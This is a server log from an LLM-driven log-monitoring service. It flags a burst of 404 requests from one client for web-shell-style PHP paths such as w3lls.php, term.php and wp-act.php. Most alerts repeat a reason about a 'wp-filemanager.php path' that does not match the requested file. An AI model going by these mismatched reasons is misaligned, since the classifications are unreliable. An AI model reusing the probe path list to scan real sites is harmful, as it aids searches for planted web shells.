Mar 20 14:00:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:13.287799 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:00:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:13.287839 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP file that does not exist may indicate probing for vulnerable endpoints or misconfigured site; common attack surface Line=2026-03-20T13:58:57.264074810Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/000.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:00:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:18.483316 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:00:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:18.483355 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=NGINX error indicating a missing file being requested (w3lls.php) which may indicate an probe for common web shells or misconfiguration. Not definitive malicious activity but warrants attention. Line=2026-03-20T13:58:57.333074128Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/w3lls.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request:...
Mar 20 14:00:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:18.483432 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.333090951Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /w3lls.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:18.483463 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.400965372Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws86.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:23.397561 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:00:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:23.397604 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx open() error shows missing file ws86.php being requested, which could indicate probing or misconfiguration. Not clearly malicious but warrants monitoring. Line=2026-03-20T13:58:57.400949122Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws86.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:00:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:28.420235 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:00:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:28.420272 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error while opening a file requested by a client; could indicate probing for non-existent PHP file or misconfiguration. Line=2026-03-20T13:58:57.468579638Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/xwx1.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:00:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:28.420334 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.468589133Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /xwx1.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:28.420363 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.536628893Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ggb.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:31.937659 [observer] Pipeline: processed=5951 pattern_hits=5631 llm_calls=320 llm_errors=3 learned=4
Mar 20 14:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:31.937686 [observer] Patterns: hash=5631 prefix=0 regex=0 contains=0 deny=68 alert=451 suppress=0 misses=320
Mar 20 14:00:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:35.651113 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 14:00:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:35.651152 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 14:00:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:42.627731 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:00:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:42.627777 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a PHP file (xff.php) that does not exist; could indicate probing for sensitive files or misconfigured routing. Line=2026-03-20T13:58:57.604352209Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/xff.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:00:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:42.627866 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.604358361Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /xff.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:42.627899 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.672098491Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wwx.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:47.155007 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:00:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:47.155045 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log shows a request targeting /wwx.php resulting in a missing file, which can indicate probing for vulnerable PHP files or misconfigurations. Line=2026-03-20T13:58:57.672071324Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/wwx.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:00:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:53.667118 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:00:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:53.667155 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /term.php could indicate probing for PHP endpoints; the file does not exist, but repeated requests to PHP files are common in automated scans. Line=2026-03-20T13:58:57.740430822Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/term.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:00:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:53.667234 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.740586695Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /term.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:00:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:58.628668 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:00:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:58.628706 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a PHP file (ws77.php) that does not exist; could indicate probing or misconfiguration. Line=2026-03-20T13:58:57.808509603Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws77.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:00:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:00:58.628897 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.808610340Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws77.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:01.948846 [observer] Pipeline: processed=5960 pattern_hits=5635 llm_calls=325 llm_errors=3 learned=4
Mar 20 14:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:01.948876 [observer] Patterns: hash=5635 prefix=0 regex=0 contains=0 deny=68 alert=455 suppress=0 misses=325
Mar 20 14:01:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:03.711229 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:01:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:03.711273 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to gifclass.php is commonly probed for web shells or vulnerable PHP scripts; file not found indicates an unsuccessful probe but pattern resembles automated scanning. Line=2026-03-20T13:58:57.877247383Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/gifclass.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reque...
Mar 20 14:01:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:03.711340 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.877320700Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /gifclass.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:09.123341 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:01:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:09.123375 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing an attempt to access a missing PHP file from a client, which can indicate probing or misconfiguration. Not clearly malicious but warrants monitoring. Line=2026-03-20T13:58:57.945079108Z 2026/03/20 13:58:57 [error] 422#422: *750796 open() "/usr/share/nginx/default/8.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "GE...
Mar 20 14:01:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:09.123446 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:57.945083437Z 4.204.200.32 - - [20/Mar/2026:13:58:57 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /8.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:15.333736 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:01:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:15.333773 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Standard nginx error log showing a 404-like missing file (155.php) under /usr/share/nginx/default and a client request for /155.php. Could indicate probing for PHP files or misconfigured routing, but not clearly malicious on its own. Line=2026-03-20T13:58:58.014949426Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/155.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:01:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:15.333835 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.015020648Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /155.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:19.853593 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:01:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:19.853634 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error indicating a missing PHP file mh.php was requested, which can indicate probing for vulnerable PHP scripts. Not definitively malicious, but warrants alert. Line=2026-03-20T13:58:58.082606358Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/mh.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:01:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:19.853695 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.082801204Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /mh.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:24.833366 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:01:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:24.833402 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access to a PHP file under the nginx default root (222.php) that does not exist could indicate a probe for PHP files or an attempted exploit targeting misconfigurations. Line=2026-03-20T13:58:58.150607495Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/222.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:01:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:24.833463 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.150675592Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /222.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:30.210328 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:01:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:30.210367 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a non-existent file (hehe.php) via nginx may indicate probing for sensitive scripts. Line=2026-03-20T13:58:58.218431235Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/hehe.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:01:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:30.210435 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.218446907Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /hehe.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:31.939020 [observer] Pipeline: processed=5972 pattern_hits=5641 llm_calls=331 llm_errors=3 learned=4
Mar 20 14:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:31.939047 [observer] Patterns: hash=5641 prefix=0 regex=0 contains=0 deny=68 alert=461 suppress=0 misses=331
Mar 20 14:01:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:36.729684 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:01:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:36.729724 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP request to a potentially sensitive PHP file (tool.php) resulted in a missing file error. Could indicate probing or misconfiguration; not definite maliciousness but warrants attention. Line=2026-03-20T13:58:58.286300839Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/tool.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:01:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:36.729833 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.286431785Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /tool.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:40.970221 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:01:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:40.970265 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to wp-act.php suggests probing for WordPress vulnerability; the file does not exist but the request pattern indicates potential exploitation attempts. Line=2026-03-20T13:58:58.354041071Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-act.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:01:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:40.970331 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.354042970Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-act.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:47.687883 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:01:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:47.687918 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Open() failed for cu.php in nginx default directory suggests probing for a PHP file, common during vulnerability scanning or misconfigured requests. Line=2026-03-20T13:58:58.421879668Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/cu.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:01:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:47.687983 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.421888179Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /cu.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:01:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:53.937575 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 14:01:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:53.937613 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 14:01:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:01:53.937677 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.494339172Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /fs.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:00.198298 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:02:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:00.198434 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to obscure PHP file (asd.php) resulting in missing file; could indicate probing or vulnerability scanning. Line=2026-03-20T13:58:58.564128906Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/asd.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:02:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:00.198519 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.564150663Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /asd.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:01.988466 [observer] Pipeline: processed=5982 pattern_hits=5646 llm_calls=336 llm_errors=3 learned=4
Mar 20 14:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:01.988496 [observer] Patterns: hash=5646 prefix=0 regex=0 contains=0 deny=68 alert=466 suppress=0 misses=336
Mar 20 14:02:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:06.449180 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:02:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:06.449220 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request for a PHP file ws80.php under nginx default path; file missing but indicates probing or unexpected PHP asset access. Line=2026-03-20T13:58:58.634202148Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws80.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:02:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:06.449294 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.634285335Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws80.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:06.449337 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.701848364Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ms.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:11.382739 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:02:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:11.382777 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP request attempted to access a PHP file (ms.php) that does not exist, which can indicate probing for vulnerable endpoints. It's an unusual error and warrants attention but not definitive maliciousness. Line=2026-03-20T13:58:58.701850128Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/ms.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:02:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:16.199947 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:02:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:16.199997 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing a request to a non-existent PHP file (jga.php) with a distinctive connection and client IP may indicate probing or attempted access to server resources. Line=2026-03-20T13:58:58.769494123Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/jga.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:02:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:16.200060 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.769603987Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /jga.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:21.097086 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
